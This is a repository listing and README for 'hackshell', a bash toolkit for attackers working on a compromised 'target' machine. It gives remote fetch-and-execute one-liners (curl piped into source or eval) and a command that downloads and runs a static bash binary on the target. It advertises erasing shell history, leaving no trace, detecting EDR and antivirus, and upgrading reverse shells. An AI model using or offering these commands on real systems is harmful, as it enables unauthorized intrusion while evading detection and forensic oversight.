https://github.com/hackerschoice/hackshell
Make BASH stealthy and hacker friendly with lots of bash functions
https://github.com/hackerschoice/hackshell
Last synced: 3 months ago
JSON representation
Make BASH stealthy and hacker friendly with lots of bash functions
- Host: GitHub
- URL: https://github.com/hackerschoice/hackshell
- Owner: hackerschoice
- Created: 2024-07-16T15:56:11.000Z (12 months ago)
- Default Branch: main
- Last Pushed: 2025-04-07T10:52:14.000Z (3 months ago)
- Last Synced: 2025-04-12T20:46:49.723Z (3 months ago)
- Language: Shell
- Size: 308 KB
- Stars: 249
- Watchers: 7
- Forks: 28
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# hackshell
Make BASH stealthy and hacker friendly with lots of bash functionsUsage:
```shell
source <(curl -SsfL https://thc.org/hs)
``````shell
eval "$(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)"
```Some features:
* unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
* Auto-Upgrates to PTY shell (if reverse shell)
* Creates hacker-friendly shortcuts, bash-functions and aliases
* Detects EDR/AV/SELinux/AppArmor/LKMs/...
* Static binary download by simple `bin ` (e.g. `bin nmap`)
* Does not write ANY data to the harddrive
* Leaves no trace
It works best with bash. Download BASH if there is no bash on your target:
```shell
URL="https://bin.pkgforge.dev/$(uname -m)/bash"
[ "$(uname -m)" == i686 ] && URL='https://github.com/polaco1782/linux-static-binaries/raw/refs/heads/master/x86-i686/bash'
curl -obash -SsfL "${URL}" && chmod 700 bash && ./bash --version && exec ./bash -il
```